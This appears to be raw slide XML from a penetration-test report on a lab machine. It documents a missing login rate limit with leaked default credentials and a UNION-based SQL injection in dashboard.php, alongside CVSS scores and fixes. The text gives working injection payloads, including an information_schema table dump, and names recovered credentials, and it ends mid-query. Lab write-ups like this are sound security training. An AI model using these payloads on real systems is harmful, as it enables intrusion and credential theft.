          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Recommendation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Implement Rate Limiting: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>on the login page by restricting requests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> PHP session tracking (block after 5 failed attempts).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Enforce Account Lockout:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Lock accounts after 5 failed attempts (e.g., via fail2ban or application logic).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Add CAPTCHA/MFA: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Use reCAPTCHA or time-based OTPs (e.g., Google Authenticator).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Password Policies:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Require strong passwords (12+ chars, special characters).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Disallow default credentials (e.g., admin:321).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS Score: 5.3 (Medium)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS String: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Reference: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>CWE-307: Improper Restriction of Excessive Authentication Attempts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://cwe.mitre.org/data/definitions/307.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Proof of Concept (PoC):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Identify Login Endpoint: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Observed POST request to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Exploit Leaked Credentials: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>lanf@admin.com:321</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2465473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31C28-7C70-EF80-A2A6-0027CADE68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EE685-DF56-14C4-4A03-7F8A0E649E96}"/>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63AC4CD9-CD27-F1A9-A9AF-88489FA0C7CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258418" y="805071"/>
            <a:ext cx="7022713" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Process Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Reconnaissance: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Found login form via HTTP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Testing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No lockout observed after multiple failed attempts (implied by lack of errors).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leveraged weak credentials from Git logs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Steps to Reproduce:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.139.143.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Observe successful login with weak/default credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Impact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Immediate: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unauthorized access to user accounts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Secondary: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enabled SQLi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>dashboard.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and RCE (via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>index.php?cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFCD004D-41AE-D2CA-6FDF-E5DBED12EF97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7281131" y="530552"/>
            <a:ext cx="4420823" cy="2387776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{136D49AA-0AAF-9A26-CFA4-061E8500DA62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7281131" y="3429000"/>
            <a:ext cx="4491767" cy="2546247"/>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3349636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7E884-1D8A-B44B-0F99-BAAD1D4ABE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2B248-AC56-35BE-328E-3BE3A5D4F0F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>SQL Injection via ‘id’ Parameter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08359B73-B2E2-A913-6764-B028F1D17864}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>SQL Injection in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>dashboard.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> via id Parameter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>dashboard.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> page was vulnerable to UNION-based SQL injection due to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>unsanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> input in the id GET parameter. Could extract database schemas, tables, and credentials (e.g., SSH credentials from the darkhole_2 database). Execute arbitrary SQL queries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Affected Machine, URL  Parameter: URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://192.168.139.143/dashboard.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>                                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Parameter:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>id (e.g., id=' UNION SELECT 1,2,3,4,5,6-- -).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>because it allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>remote attackers to steal/destroy database contents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> with minimal effort, leading to full system compromise. The impact is severe (confidentiality/integrity/availability all compromised) while being trivially exploitable.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Risk/Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>Data Theft: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0"/>
              <a:t>Extracted database names, tables (e.g., ssh), and credentials </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" i="1" dirty="0" err="1"/>
              <a:t>jehad:fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" i="1" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>Authentication Bypass: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0"/>
              <a:t>Stolen credentials allowed SSH access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>System Compromise: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0"/>
              <a:t>Led to RCE (via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0" err="1"/>
              <a:t>index.php?cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0"/>
              <a:t>=) and root access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Recommendation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>Input Validation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Ensures only properly formatted data is processed by rejecting malformed inputs (e.g., blocking SQL metacharacters like ' or ").</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>WAF Rules: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Block SQL keywords (e.g., UNION, SELECT) in id.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>Error Handling: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Disable detailed errors (e.g., hide 500 Internal Server Error).</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4051785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A06C2-12BB-B587-41F5-5E1E8DA8F7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CA831-00CA-4EED-50AE-A6C83D14C985}"/>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A4D78EE8-0108-DFDA-6D5A-5CE53152F381}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258418" y="805071"/>
            <a:ext cx="7026966" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS Score: 8.8 (High)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS String: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>References:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://owasp.org/www-community/attacks/SQL_Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://cwe.mitre.org/data/definitions/89.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Proof of Concept (PoC):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Detect Injection Point</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>dashboard.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>=' HTTP/1.1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Exfiltrate Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>dashboard.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>=' UNION SELECT 1,GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>),3,4,5,6 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> WHERE </a:t>
